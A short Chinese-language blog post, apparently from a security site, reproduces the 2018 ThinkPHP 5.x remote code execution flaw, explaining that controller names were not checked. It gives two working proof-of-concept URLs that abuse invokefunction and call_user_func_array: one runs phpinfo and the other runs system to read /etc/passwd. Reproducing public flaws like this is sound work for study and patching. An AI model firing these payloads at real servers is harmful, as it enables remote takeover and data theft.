网络安全/渗透测试/代码审计/
关注
ThinkPhp5.x远程代码执行漏洞复现
漏洞简介
2018年12月10日中午,thinkphp官方公众号发布了一个更新通知,包含了一个5.x
系列所有版本存在被getshell的高风险漏洞。
漏洞原理
结合官方公告说的由于对控制器名没有足够的检测,再查看官方git commit
信息
复现过程
通过phpinfo函数写出phpinfo()的信息
POC:
代码语言:javascript复制通过phpinfo函数写出phpinfo()的信息
index.php?s=/Index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
利用system函数远程命令执行
POC:
代码语言:javascript复制利用system函数远程命令执行读取/etc/passwd
index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /etc/passwd